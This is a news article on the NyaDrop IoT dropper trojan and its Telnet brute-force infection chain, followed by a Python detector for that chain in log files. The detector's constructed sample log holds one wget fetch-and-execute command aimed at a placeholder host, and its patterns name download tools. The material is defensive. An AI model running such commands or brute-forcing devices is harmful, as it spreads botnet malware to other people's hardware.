The Krebs DDoS attacks have proven that the IoT landscape is a fertile ground that can breed huge botnets capable of launching massive DDoS assaults. As such, it should be no surprise that malware authors are now focusing their efforts on this sector and putting out new threats in the hopes of building the next Mirai botnet.
One of the latest additions to the IoT malware market is a trojan codenamed Linux/NyaDrop, recently reverse engineered by MalwareMustDie, the same researcher who discovered the Mirai malware.
MalwareMustDie points out in his research that this binary appeared in May, but was somewhat simplistic and not that common. Things changed after the Krebs DDoS attacks, and a new sample has appeared on the market, with the malware’s author most likely drawn back to the IoT landscape by Mirai’s success.
Just like most IoT malware nowadays, NyaDrop’s author relies on brute-forcing Internet-exposed IoT devices using their default credentials.
In a conversation on Twitter, MalwareMustDie tells Softpedia that the attacks happen on the devices’ Telnet ports, which is a common practice in IoT attacks.
If the brute-force attacker manages to authenticate on the device, a script executes a series of automated commands that download and execute the NyaDrop binary.
The NyaDrop trojan is very small in size. This is because the malware is just a “dropper,” a term used to describe malware whose only job is to download other, more potent malware.
Employing droppers to fetch the final payload is a common practice for desktop malware but has not commonly been seen in IoT malware.
NyaDrop’s purpose is to probe the system and decide whether to download the actual malware, which is an ELF (Linux-specific) binary called “nya,” hence the malware’s name of NyaDrop.
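The intrusion chain described above (Telnet default-credential brute force, a successful login, then a scripted download-and-execute of the dropper) can be spotted in device logs as a sequence of events from one source address. The detector below is an added example, not code from the article or from MalwareMustDie; it assumes a constructed, telnetd-style log format and makes no claim about any real device's log syntax.

```python
import re
from collections import defaultdict
from datetime import datetime

# Constructed sample log in an assumed telnetd-style format (not real device output).
# One source brute-forces logins, succeeds, then issues a download-and-execute command.
SAMPLE_LOG = """\
2016-10-14T02:11:03 telnetd[812]: login failed for 'root' from 203.0.113.7
2016-10-14T02:11:04 telnetd[812]: login failed for 'admin' from 203.0.113.7
2016-10-14T02:11:05 telnetd[812]: login failed for 'root' from 203.0.113.7
2016-10-14T02:11:06 telnetd[812]: login failed for 'support' from 203.0.113.7
2016-10-14T02:11:07 telnetd[812]: login succeeded for 'root' from 203.0.113.7
2016-10-14T02:11:08 sh[813]: cmd from 203.0.113.7: cd /tmp; wget http://192.0.2.9/dropper; chmod +x dropper; ./dropper
2016-10-14T02:20:30 telnetd[812]: login failed for 'root' from 198.51.100.2
2016-10-14T02:30:00 telnetd[812]: login succeeded for 'pi' from 10.0.0.5
"""

FAIL_RE = re.compile(r"^(\S+) telnetd\[\d+\]: login failed for '[^']*' from ([\d.]+)$")
OK_RE = re.compile(r"^(\S+) telnetd\[\d+\]: login succeeded for '[^']*' from ([\d.]+)$")
CMD_RE = re.compile(r"^(\S+) sh\[\d+\]: cmd from ([\d.]+): (.*)$")
DOWNLOAD_RE = re.compile(r"\b(wget|curl|tftp|ftpget)\b")   # fetch tools typical of dropper scripts
EXEC_RE = re.compile(r"chmod \+x|\./\S+")                   # mark executable / run from cwd


def parse_ts(text):
    return datetime.strptime(text, "%Y-%m-%dT%H:%M:%S")


def find_dropper_intrusions(log_text, min_failures=3, window_s=60):
    """Return {source_ip: stage} for sources that reach at least the brute-force stage.

    stage "brute_force_success": >= min_failures failed logins within window_s seconds
    before a successful login; stage "dropper_fetch_and_exec": that source then ran a
    command that both downloads a file and executes it, the dropper pattern the text describes.
    """
    fails = defaultdict(list)   # ip -> timestamps of failed logins
    results = {}
    for line in log_text.splitlines():
        if m := FAIL_RE.match(line):
            fails[m.group(2)].append(parse_ts(m.group(1)))
        elif m := OK_RE.match(line):
            ts, ip = parse_ts(m.group(1)), m.group(2)
            recent = [t for t in fails[ip] if 0 <= (ts - t).total_seconds() <= window_s]
            if len(recent) >= min_failures:
                results[ip] = "brute_force_success"
        elif m := CMD_RE.match(line):
            ip, cmd = m.group(2), m.group(3)
            if ip in results and DOWNLOAD_RE.search(cmd) and EXEC_RE.search(cmd):
                results[ip] = "dropper_fetch_and_exec"
    return results


if __name__ == "__main__":
    print(find_dropper_intrusions(SAMPLE_LOG))
```

Raising `min_failures` or shrinking `window_s` trades recall for fewer false positives on devices where legitimate users mistype passwords; tune both against normal traffic before alerting on the result.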